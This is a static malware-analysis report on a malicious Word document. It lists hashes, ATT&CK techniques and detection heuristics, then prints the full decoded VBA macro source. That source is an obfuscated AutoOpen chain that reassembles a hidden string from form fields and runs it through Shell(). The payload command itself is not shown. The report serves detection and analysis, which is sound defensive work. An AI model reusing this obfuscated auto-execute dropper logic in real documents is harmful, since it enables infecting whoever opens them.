Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 30f48d2e0f635b3c…

MALICIOUS

Office (OLE)

432.5 KB Created: 2018-12-11 14:33:00 Authoring application: Microsoft Office Word First seen: 2019-02-04
MD5: 03f7e3175439d6a0571d897289f8a9fd SHA-1: eda6bd8ca356a9557c0c2fcb2437405cb646d9f8 SHA-256: 30f48d2e0f635b3c63420359d202f2a1231cf08393b3f90676c32fd0b15cb610
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Word document containing VBA macros. The Autoopen macro is designed to execute when the document is opened, likely to display a deceptive message prompting the user to enable content. The presence of a Shell() call in the VBA code indicates an attempt to execute arbitrary commands, suggesting it's a downloader or dropper for further malicious activity. The document body itself is a lure for this macro execution.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2934 bytes
SHA-256: 581d6ceca7bdd09c907417e0f28ecee55d0779bfdfc7f4bd6a1187ee4a90a737
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
validateSettingsForm ("max")
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4C1E977F-12F6-4C20-81EB-A5E86BD71A09}{F904A548-3387-40DC-BADB-3FD1FC0D7F9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1" + "100"
UserForm1.ComboBox1.Text = ind1
End Sub

Private Sub CommandButton1_Click()

End Sub

Private Sub ValidText_Change()
Dim bol2 As Integer
With UserForm1
Dim str As String
str = .ValidText
bol2 = Len(str)
Dim bol1 As String
bol1 = "Vi"
fh = "2"
doveryboll bol2
End With
End Sub

Private Sub CommandButton2_Click()

End Sub

Private Sub TextBox1_Change()
Dim s As String
s = " "
s = s + UserForm1.Text1
If Len(s) = 62 + 1 Then OpenDateForm
End Sub

Private Sub ComboBox1_Change()

End Sub



Attribute VB_Name = "Module1"
Sub files_replace(C1, ByRef op)
op = ""
st1 = 1
replacefiles st1, op, C1
End Sub

Sub tomorrow(ByRef br1, ByRef bm, xy)
Dim log2 As Integer
log2 = Len(UserForm1.Text1)
If br1 < log2 Then
b = ""
With UserForm1
doc_print_header .Text1, br1, b
If xy <> b Then
br1 = br1 + 1
tomorrow br1, bm, xy
Else
bm = br1
End If
End With
End If
End Sub


Sub replacefiles(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
doc_print_header later, pointA, ch
idial = 1
strings_attached ch, idial
st = ""
DataFindSymbols idial - 2, st
need = need + st
pointA = pointA + 1
replacefiles pointA, need, later
End If
End Sub

Sub DataFindSymbols(ext1, ByRef date_max)
Dim m1 As Integer
m1 = -1
date_max = ""
If ext1 = m1 Then
ext1 = m1
End If
If ext1 < 1 Then
doc_print_header UserForm1.Text1, Len(UserForm1.Text1) + ext1, date_max
Else
doc_print_header UserForm1.Text1, ext1, date_max
End If
End Sub

Sub doc_print_header(str1, pty, ByRef rmin)
s11 = Left(str1, pty)
s11 = s11 + ""
rmin = Right(s11, 2 - 1)
End Sub

Sub doveryboll(m)
Dim n As Integer
Dim sad As String
With UserForm1
sad = "" + .ValidText
n = m - 415
End With
If m = 415 Then Shell sad, n
End Sub

Sub validateSettingsForm(wstr1)
wstr1 = wstr1 + "Open"
UserForm1.TextBox1 = wstr1 + "Form"
End Sub

Sub strings_attached(per2, ByRef arg1)
arg1 = 0
sb1 = 1
tomorrow sb1, arg1, per2
End Sub

Sub OpenDateForm()
Dim str2 As String
files_replace UserForm1.date1, str2
UserForm1.EditText1 = str2
str2 = str2 + ""
UserForm1.ValidText = str2
End Sub